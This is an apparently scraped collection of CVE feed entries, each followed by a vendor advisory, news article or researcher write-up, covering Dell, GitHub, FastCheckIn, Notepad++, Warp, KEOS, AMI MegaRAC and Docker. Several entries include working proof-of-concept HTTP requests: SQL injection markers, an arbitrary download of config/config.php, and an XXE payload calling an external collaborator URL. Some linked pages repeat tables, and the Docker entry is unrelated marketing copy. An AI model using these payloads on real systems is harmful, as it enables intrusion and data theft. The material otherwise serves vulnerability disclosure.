Dell Command | Update, Dell Update, and Alienware Update versions prior to 4.7 contain a improper verification of cryptographic signature in get applicable driver component. A local malicious user could potentially exploit this vulnerability leading to malicious payload execution.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-34459

Dell Command | Update, Dell Update, and Alienware Update versions before 4.7 contain an Improper Verification of Cryptographic Signature vulnerability. A local malicious user could potentially exploit this vulnerability leading to malicious payload execution.

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-34458

Dell Command | Update, Dell Update, and Alienware Update versions before 4.7 contain an Exposure of Sensitive System Information to an unauthorized user vulnerability. A local malicious user could potentially exploit this vulnerability leading to the disclosure of confidential data.

6.6

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-34459

Dell Command | Update, Dell Update, and Alienware Update versions before 4.7 contain an Improper Verification of Cryptographic Signature vulnerability. A local malicious user could potentially exploit this vulnerability leading to malicious payload execution.

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-34458

Dell Command | Update, Dell Update, and Alienware Update versions before 4.7 contain an Exposure of Sensitive System Information to an unauthorized user vulnerability. A local malicious user could potentially exploit this vulnerability leading to the disclosure of confidential data.

6.6

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

Dell Command | Update  
 

Versions before 4.7.1  
 

4.7.1  
 

Universal Windows Platform version for Windows 10 32-bit and 64-bit

Dell Command | Update Application for Windows 10 | Driver Details | Dell US

Dell Update /  
Alienware Update

Versions before 4.7.1  
 

4.7.1  
 

Universal Windows Platform version for Windows 10 32-bit and 64-bit  
Dell Update/Alienware Update Application for Windows 10 | Driver Details | Dell US

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

Dell Command | Update  
 

Versions before 4.7.1  
 

4.7.1  
 

Universal Windows Platform version for Windows 10 32-bit and 64-bit

Dell Command | Update Application for Windows 10 | Driver Details | Dell US

Dell Update /  
Alienware Update

Versions before 4.7.1  
 

4.7.1  
 

Universal Windows Platform version for Windows 10 32-bit and 64-bit  
Dell Update/Alienware Update Application for Windows 10 | Driver Details | Dell US

**Kiitokset**

**CVE-2022-34458**: Dell would like to thank Alexander Pudwill for reporting this issue.

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2022-11-14

Initial Release

20.

2022-12-08

Updated Affected Products and Remediation section: Affected Version, Updated Version, and Link to Update

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

12 jouluk. 2022

CVE-2022-34459: DSA-2022-298: Dell Command | Update, Dell Update, and Alienware Update Security Update for Multiple Vulnerabilities

By Deeba Ahmed
GitHub states that hackers gained access to its code repositories and stole code-signing certificates for two of its desktop apps: Desktop and Atom.
This is a post from HackRead.com Read the original post: GitHub Reports Code-Signing Certificate Theft in Security Breach

Although attackers exfiltrated a set of encrypted code-signing certificates, these were password-protected, so there is no possibility of malicious use.

**GitHub** revealed that on December 7th, 2022, hackers had gained unauthorized access to several of its code repositories and stolen code-signing certificates for two of its desktop apps: **Atom** and **Desktop**. The repositories were used in the planning and development of these applications.

A further probe led to the conclusion that GitHub’s services were not at risk, and no unauthorized changes were made to these projects. Although attackers exfiltrated a set of encrypted code-signing certificates, these were password-protected, so there is no possibility of malicious use.

The **repositories were cloned** one day prior by a compromised PAT (personal access token) associated with a machine account. GitHub did not reveal how the token was breached. Alexis Wales from GitHub stated in a **blog post**:

> “Several encrypted code signing certificates were stored in these repositories for use via Actions in our GitHub Desktop and Atom release workflows. We have no evidence that the threat actor was able to decrypt or use these certificates.”
> 
> GitHub

GitHub has decided to revoke the exposed certificates used for Atom and Desktop applications. The revocations will be effective this Thursday and prevent some impacted versions of these apps from working. Revoking these certificates will render some versions of GitHub Desktop for Mac and Atom invalid; however, current versions of Desktop and Atom are unaffected by this theft.

For your information, code-signing certificates place a cryptographic stamp on the code to verify that the enlisted organization, i.e., GitHub, has developed it. If it gets decrypted, the certificates will allow an attacker to sign the app’s unofficial version, which has already been tampered with and pass them off as official updates from GitHub.

Affected apps include the following versions of GitHub Desktop for Mac:

*   3.1.2
*   3.1.1
*   3.1.0
*   3.0.8
*   3.0.7
*   3.0.6
*   3.0.5
*   3.0.4
*   3.0.3
*   3.0.2

The following versions of GitHub Atom have been affected.

*   1.63.1
*   1.63.0

It is worth noting that GitHub Desktop for Windows is not affected by this credential theft. On January 4, GitHub published a **new version** of its Desktop app, which was signed with new certificates that weren’t exposed to the attacker(s). GitHub Desktop users should upgrade to the latest version.

**_More GitHub Security News_**

1.  **GitHub: Hackers Stole OAuth Access Tokens to Target Orgs**
2.  **GitHub Attack Allowed Hackers to Steal Okta’s Source Code**
3.  **GitHub fixes vulnerability that exposed repositories to attackers**
4.  **GitHub Abused to Spread Malicious PyPI Packages in Image Files**
5.  **Hackers spoof commit metadata to create false GitHub repositories**

GitHub Reports Code-Signing Certificate Theft in Security Breach

An arbitrary file write vulnerability in Serenissima Informatica Fast Checkin v1.0 allows unauthenticated attackers to upload malicious files in the web root of the application to gain access to the server via the web shell.

L’ **Offensive Security Team** di **Swascan** ha identificato **3** vulnerabilità sul prodotto.

**Serenissima Informatica SpA**

_Serenissima Informatica è un’azienda che si occupa dello sviluppo di soluzioni per la gestione di PMI, Hotel e catene alberghiere, ristoranti e GDO._

**FastCheckIn – descrizione prodotto**

_Il prodotto FastCheckin (Web Check-In)_ in particolare aiuta gli utenti di Hotel e catene alberghiere nella compilazione dei propri dati e nella gestione delle proprie prenotazione online.

**Technical summary**

L’Offensive Security Team di Swascan ha identificato importanti vulnerabilià su: _FastCheckIn_:

**Vulnerabilità**

**CWE-ID**

**CVSSv3.1 Vector String**

**CVSSv3.1 Base Score**

**Arbitrary File Write (non autenticato)**

CWE-22

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

**9.8 – Critical**

**SQL Injection (non autenticato)**

CWE-89

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**9.8 – Critical**

**Absolute/Relative Path Traversal (non autenticato)**

CWE-22

AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

**8.6 – High**

 Swascan ha scelto di non divulgare i dettagli tecnici della vulnerabilità.

Nella sezione seguente la Proof-of-Concept con evidenze offuscate sulle vulnerabilità riscontrate.

**Arbitrary File Write (non autenticato) – CVE-2022-47769****Descrizione**

L’applicazione risulta vulnerabile ad Arbitrary File Write. 

Un attaccante, remotamente e in modalità non autenticata, potrà scrivere nella web root dell’applicazione, qualsiasi file dal contenuto arbitrario per alterare e/o bloccare il funzionamento dell’applicativo oppure per ottenere l’accesso al server tramite web shell.

**Proof of Concept**

Si mostra di seguito come sia stato possibile scrivere una web shell nella web root dell’applicazione web ed ottenere accesso al server.

Per ottenere tale risultato sono stati effettuati i seguenti passaggi:

1.  Esecuzione di una HTTP Post Request per scrivere una WebShell (nell’esempio con il nome _70347276-ee93-4366-b396-e1496f67ed6d.aspx_ ) all’interno della web root;
2.  Esecuzione di comandi sul server tramite WebShell.

Evidenza 1 Richiesta HTTP contenente la WebShell

Il file C:\\\\FastCheckIn\\\\FastCI\\\\70347276-ee93-4366-b396-e1496f67ed6d.aspx è stato quindi creato con successo e raggiungibile dal web come mostrato nell’evidenza successiva:

Evidenza 2  Esecuzione tramite webshell del comando “whoami”

**Riferimenti**

https://cwe.mitre.org/data/definitions/20.html

http://cwe.mitre.org/data/definitions/22.html

https://owasp.org/www-community/attacks/Path\_Traversal

https://cheatsheetseries.owasp.org/cheatsheets/Input\_Validation\_Cheat\_Sheet.html

**SQL Injection (non autenticato) – CVE-2022-47770****Descrizione**

L’applicazione web è vulnerabile ad attacchi di tipo SQL Injection non autenticati.

Un potenziale attaccante sarà in grado accedere remotamente, completamente ed in maniera non autenticata alle informazioni contenute nella banca dati ed effettuare operazioni come esfiltrazione e modifica di account utente ed amministrativi, dati personali di utenti ed altre informazioni in essa contenute.

**Proof of Concept**

Si mostrano di seguito le evidenze della vulnerabilità e di come sia possibile estrarre informazioni sensibili dall’interno della banca dati.

Di seguito l’evidenza dell’enumerazione del DMBS, Microsoft SQL Server e la lista offuscata) di tutti i database presenti sul server:

Evidenza 4 SQLMap Lista database

Ciò conferma la presenza della vulnerabilità.

A fronte della corretta exploitation di questo tipo di vulnerabilità, un attaccante potrebbe acquisire i diritti di amministratore dell’applicativo web, con conseguente accesso a tutte le funzionalità del portale.

**Riferimenti**

https://www.owasp.org/index.php/SQL\_Injection

https://cwe.mitre.org/data/definitions/89.html

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SQL\_Injection\_Prevention\_Cheat\_Sheet.md

https://owasp.org/Top10/A03\_2021-Injection/

https://www.cve.org/CVERecord?id=CVE-2022-47770

**Path Traversal (non autenticato) – CVE-2022-47768****Descrizione**

La vulnerabilità Path Traversal (Relative e Absolute) consente l’accesso a file presenti nel sistema operativo che risiedono al di fuori della web root dell’applicazione. Manipolando le variabili che richiedono i file, attraverso l’uso dei caratteri “../” o di un path assoluto (eg. C:\\…) è possibile accedere arbitrariamente ai file e/o cartelle contenuti nel sistema operativo come il codice sorgente dell’applicazione o file sensibili che risiedono nella macchina.

**Proof of Concept**

Di seguito vengono mostrate le evidenze di come è possibile leggere il contenuto di file sul filesystem. Nell’esempio viene mostrata la possibilità di leggere il file c:\\windows\\win.ini:

Evidenza 5 Richiesta e Risposta HTTP della vulnerabilità Absolute Path Traversal

**Riferimenti**

https://cwe.mitre.org/data/definitions/22.html

https://cwe.mitre.org/data/definitions/23.html

https://owasp.org/Top10/A01\_2021-Broken\_Access\_Control/

https://owasp.org/www-community/attacks/Path\_Traversal

https://www.cve.org/CVERecord?id=CVE-2022-47768

**Remediation**

Swascan consiglia di non esporre l’applicativo su Internet o, qualora fosse necessario, di accedervi esclusivamente tramite connessione VPN in attesa che il vendor rilasci una patch o un aggiornamento.

**Disclosure Timeline**

*   07-08-2022: Scoperte le vulnerabilità
*   07-08-2022: Vendor contattato tramite mail (1° tentativo, nessuna risposta)
*   22-09-2022: Vendor contattato tramite mail (2° tentativo, con risposta)
*   22-09-2022: Invio del report contenente le vulnerabilità
*   11-01-2023: Swascan ricontatta il vendor per eventuale review del documento (nessuna risposta)
*   18-01-2023: Swasacan ricontatta il vendor per eventuale review (nessuna risposta)
*   31-01-2023: Swascan pubblica la vulnerabilità

CVE-2022-47769: Security Advisory: Serenissima Informatica – FastCheckIn (CVE-2022-47768/CVE-2022-47769/ CVE-2022-47770)

Notepad++ v8.4.1 was discovered to contain a stack overflow via the component Finder::add().

****CVE-2022-31902****

*   Denial Of Service (DoS) in Notepad++(x86) in 8.4.3 and before.

****Description****

*   Vulnerability triggering, via opening a specially crafted text file (e.g. first.txt) and then using options Find All in All Opened Document or Find All in Current Opened Document under Find options.

As an illustrative example below, as of 11/07/2022, latest version of Notepad++(x86) is 8.4.3 is used.

**Proof of Concept -**

*   Open first.txt and Search for any character in Notepad++, and press Find All in All Opened Document or Find All in Current Opened Document button.

**Result :**

**Visual Studio 2019 Dump Analysis**

Here we can see, the problem is in **ScintallComponent -> ScintillaWin.cxx-> Line number 3699.**

**Root Cause Analysis**

*   When user uses the find functionality of notepad++ in first.txt, it results in application to crash.
    
*   Notepad++ calls a function **finder::add** in **findReplaceDlg.cpp** file which calls push\_back(foundinfo) function, which internally calls for memory allocation of size **4bf21** .
    
*   Due to lack of memory, the new_operator is unable to allocate the memory and returns **bad\_alloc**.
    
*   So we can say that, Searching for a character in first.txt using Find All in All Opened Document button, leading to Denial of Service.
    

**Tested Versions**

The vulnerability is tested to work on following version:

*   Notepad++ 8.3.2 32-bit
*   Notepad++ 8.3.3 32-bit.
*   Notepad++ 8.4.0 32-bit.
*   Notepad++ 8.4.1 32-bit.
*   Notepad++ 8.4.2 32-bit.
*   Notepad++ 8.4.3 32-bit.

**Tested Environment**

*   Windows 11 - 22563.1000 64 bit
*   Windows 10 - 10.0.19042.1586 64-bit
*   Windows 10 - 10.0.19044.1706 64-bit

**Update**

*   As of 05-01-2023, this issue still persists in the Notepad++ versions 8.4.8 (32-bit) and before.

CVE-2022-31902: GitHub - CDACesec/CVE-2022-31902

Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /cha.php.

**Forget Heart Message Box 1.1 has multiple SQL injections****Vulnerability Type :**

SQL Injection

**Vulnerability Version :**

1.1

**Recurring environment:**

*   Windows 10
*   PHP 7.3.4
*   Apache 2.4.43

**Vulnerability Description AND recurrence:**

Vulnerability Documentation：_adminpost.php_

Parameter: name

POST /admin/loginpost.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.2.101/
Cookie: PHPSESSID=28s17sili7ldmc68goe212s593
Content-Length: 29
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 192.168.2.101
Connection: Keep-alive

login=&name=1232\*&pass=123456

  

Vulnerability Documentation：_cha.php_

Parameter: name

POST /cha.php HTTP/1.1
Host: 192.168.2.24
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.24
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.24/cha.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qhndee8uhjmf0g0nrul6nmcurs
Connection: close

name=1\*&go=%E6%9F%A5%E8%AF%A2%E7%95%99%E8%A8%80

**Restoration suggestions**

Filtering of user input or using magic methods.

CVE-2023-24956: Forget Heart Message Box 1.1 has multiple SQL injections · Issue #1 · Mortalwangxin/lives

Easy Images v2.0 was discovered to contain an arbitrary file download vulnerability via the component /application/down.php. This vulnerability is exploited via a crafted GET request.

**EasyImages2.0-arbitrary-file-download-vulnerability****Found on: 2022-12-27****Impact version**

EasyImages2.0 ≤ v2.6.7

**Analysis Report：**

_Vulnerability path: /application/down.php_

payload：

GET /application/down.php?dw=config/config.php HTTP/1.1
Host: 192.168.2.13
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm\_lvt\_c790ac2bdc2f385757ecd0183206108d=1672116632; Hm\_lpvt\_c790ac2bdc2f385757ecd0183206108d=1672149755
Connection: close

You can download any file in the host by passing the dw parameter to the get request

**Fixes**

Specify the download directory to download only for the specified directory, other directories are filtered and requests are rejected.

CVE-2022-48161: GitHub - sunset-move/EasyImages2.0-arbitrary-file-download-vulnerability: EasyImages2.0 arbitrary file download vulnerability

Path resolution in `warp::filters::fs::dir` didn't correctly validate Windows paths
meaning paths like `/foo/bar/c:/windows/web/screen/img101.png` would be allowed
and respond with the contents of `c:/windows/web/screen/img101.png`. Thus users
could potentially read files anywhere on the filesystem.

This only impacts Windows. Linux and other unix likes are not impacted by this.


**Warp vulnerable to Path Traversal via Improper validation of Windows paths**

High severity GitHub Reviewed Published Jan 31, 2023 to the GitHub Advisory Database

GHSA-8v4j-7jgf-5rg9: Warp vulnerable to Path Traversal via Improper validation of Windows paths

Netcad KEOS 1.0 is vulnerable to XML External Entity (XXE) resulting in SSRF with XXE (remote).

**Exploit Title: CVE-2022-47873 KEOS Software XXE****Exploit Author: Ömer Akincir****Team: Ömer Yılmaz****Version: 1.0 >=****Vuln Details: XXE****Description:**

KEOS application running on the web is vulnerable to XML External Entity (XXE) attack.

**Impact:**

An attacker can trigger SSRF over XXE using Proof Of Concept.

**PoC:**

    POST /KEOS/ HTTP/1.1
    Host:
    Content-Type: application/xml
    Soapaction: ""
    Content-Length: 160
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
    
    <?xml version="1.0" encoding="utf-8"?>
    
      <!DOCTYPE roottag PUBLIC "-//A//B//EN" "http://BURP-COLLOBRATOR-URL">
    
      <roottag>test</roottag>
    

Ref: https://github.com/waspthebughunter/CVE-2022-47873

CVE-2022-47873: CVE-2022-47873 KEOS Software XXE - Fordefence - Adli Bilişim Laboratuvarı

Five vulnerabilities in the baseboard management controller (BMC) software used by 15 major vendors could allow remote code execution if attackers gain network access.

Five vulnerabilities in the baseboard management controller (BMC) firmware used in servers of 15 major vendors could give attackers the ability to remotely compromise the systems widely used in data centers and for cloud services.

The vulnerabilities, two of which were disclosed this week by hardware security firm Eclypsium, occur in system-on-chip (SoC) computing platforms that use AMI's MegaRAC Baseboard Management Controller (BMC) software for remote management. The flaws could impact servers produced by at least 15 vendors, including AMD, Asus, ARM, Dell, EMC, Hewlett-Packard Enterprise, Huawei, Lenovo, and Nvidia.

Eclypsium disclosed three of the vulnerabilities in December, but withheld information on two additional flaws until this week in order to allow AMI more time to mitigate the issues.

Since the vulnerabilities can only be exploited if the servers are connected directly to the Internet, the extent of the vulnerabilities is hard to measure, says Nate Warfield, director of threat research and intelligence at Eclypsium.

"We really don't know what the what the blast radius is on this, because while we know some of the platforms, we don't have any details as to \[how\] prolific these things are," he says. "You know, did they sell 100,000 of them? Did they sell 10 million of them? We just don't know."

Baseboard management controllers are typically a single chip — or system-on-chip (SoC) — installed on a motherboard to allow administrators to remotely manage servers with near total control. AMI's MegaRAC is a collection of software based on the Open BMC firmware project, an open source project for developing and maintaining an accessible baseboard management controller firmware.

Many server makers rely on BMC software to allow administrators to take complete control of the server hardware at a low level, giving it access to "lights-out" features, the Eclypsium advisory stated. Because the software is widely used, the footprint of the vulnerable features is quite large.

"\[V\]ulnerabilities in a component supplier affect many hardware vendors, which in turn can pass on to many cloud services," Eclypsium stated in its advisory. "As such these vulnerabilities can pose a risk to servers and hardware that an organization owns directly as well as the hardware that supports the cloud services that they use."

AMI is the latest baseboard management controller (BMC) software maker to have vulnerabilities found in their code. In 2022, Eclypsium also found vulnerabilities in Quanta Cloud Technology (QCT) servers that have found common use by cloud firms. And previous research by the company in 2020 found that the lack of signed firmware in laptops and servers could allow an attacker to install a Trojan horse to remote control the devices.

**December Flaws Most Serious**

The two latest flaws released on January 30 include two lower severity issues. The first vulnerability (CVE-2022-26872) gives an attacker the ability to reset a password if they can time the attack during a narrow window between when a one-time password is validated and when the new password is sent by the user. In the second security issue (CVE-2022-40258), the password file is hashed with a weak algorithm, Eclypsium stated.

Both issues are less severe than the three vulnerabilities disclosed in December, which include two vulnerabilities — a dangerous command in the BMC's API (CVE-2022-40259) and a default credential (CVE-2022-40242) — that could allow simple remote code execution, Eclypsium stated in the advisory. The other vulnerability (CVE-2022-2827) allows an attacker to remotely enumerate usernames via the API.

The Redfish API replaces previous versions of the Intelligent Platform Management Interface (IPMI) in modern data centers, with support from major server vendors and the Open BMC project, according to Eclypsium.

Eclypsium conducted its analysis of the AMI software after the code was leaked to the Internet by a ransomware group. AMI is not thought to be the source of the leaked software code; rather, the code is a result of a third-party vendor being hit by ransomware, Warfield says.

"What we've discovered back in the summer was that somebody had leaked intellectual property for a bunch of technology companies onto the Internet," he says. "And, as we were digging through it ... trying to figure out what it was and who had it, we came across some of AMI's intellectual property. So we kind of started digging into that to see what we could find."

**Patching Rate Unknown**

AMI has issued patched software for all five vulnerabilities, and now the mitigation of the vulnerabilities is in the hands of server makers and their customers.

Already, many vendors — such as HPE, Intel, and Lenovo — have issued advisories to their customers. However, patching those servers will be up to the companies who have the servers deployed in their data centers.

Firmware patching tends to happen at a glacial rate, which should be a worry, says Warfield.

"The tricky part is the the time between the patches coming out and people actually applying them," he says. "BMC is not something with, sort of, a Windows update mechanism, where you can say, 'Oh, I've got 100,000 servers that are affected. Let me just push this out to all of them.'"

Firmware Flaws Could Spell 'Lights Out' for Servers

Docker version 20.10.15, build fd82621 is vulnerable to Insecure Permissions. Unauthorized users outside the Docker container can access any files within the Docker container.

****Develop faster.** Run anywhere.**

The most-loved Tool in Stack Overflow’s 2022 Developer Survey.

 

Wasm is a new, fast, and light alternative to the Linux/Windows containers you’re using in Docker today — give it a try with the Docker+Wasm Beta.

Try it

**Accelerate how you build, share, and run modern applications.**

13 billion +  
monthly image downloads

**Docker makes development efficient and predictable**

Docker takes away repetitive, mundane configuration tasks and is used throughout the development lifecycle for fast, easy and portable application development – desktop and cloud. Docker’s comprehensive end to end platform includes UIs, CLIs, APIs and security that are engineered to work together across the entire application delivery lifecycle.

**Build**

*   Get a head start on your coding by leveraging Docker images to efficiently develop your own unique applications on Windows and Mac.  Create your multi-container application using Docker Compose.
*   Integrate with your favorite tools throughout your development pipeline – Docker works with all development tools you use including VS Code, CircleCI and GitHub.
*   Package applications as portable container images to run in any environment consistently from on-premises Kubernetes to AWS ECS, Azure ACI, Google GKE and more.

 

 

**Share**

*   Leverage Docker Trusted Content, including Docker Official Images and images from Docker Verified Publishers from the Docker Hub repository.
*   Innovate by collaborating with team members and other developers and by easily publishing images to Docker Hub.
*   Personalize developer access to images with roles based access control and get insights into activity history with Docker Hub Audit Logs.

**Run**

*   Deliver multiple applications hassle free and have them run the same way on all your environments including design, testing, staging and production – desktop or cloud-native.
*   Deploy your applications in separate containers independently and in different languages. Reduce the risk of conflict between languages, libraries or frameworks.
*   Speed development with the simplicity of Docker Compose CLI and with one command, launch your applications locally and on the cloud with AWS ECS and Azure ACI.

 

**New to containers?**

Today, all major cloud providers and leading open source serverless frameworks use our platform, and many are leveraging Docker for their container-native IaaS offerings.

**A Community like No Other**

Community is at the heart of what Docker does. From our Docker Captains sharing their insight and expertise, to hundreds of MeetUps around the world, to our Slack and Discourse forums for peer-to-peer support, there’s someone else out there who has been there, done that, and is eager to help.

**Use your favorite tools and images**

**Choose a subscription that is right for you**

Benefit from more collaboration, increased security, without limits… all enabled with a Docker subscription.

Check out our pricing.

**See who uses Docker**

**Go from code to cloud securely with partners that you trust**

Trust that your development pipeline workflow will work in any environment – locally and in the cloud.

 

Simplify the development of your multi-container applications from Docker CLI to Amazon ECS on AWS Fargate. 

Learn more

 

Seamlessly bring container applications from your local machine and run them in Azure container Instances.  

Learn more

 

Secure your containerized applications with vulnerability scanning and leverage trusted, certified images locally and in the cloud.

Learn more

 

Easily distribute and share Docker images with the JFrog Artifactory image repository and integrate all of your development tools.

Learn more

**Accelerate your application development today.**

Tag

#windows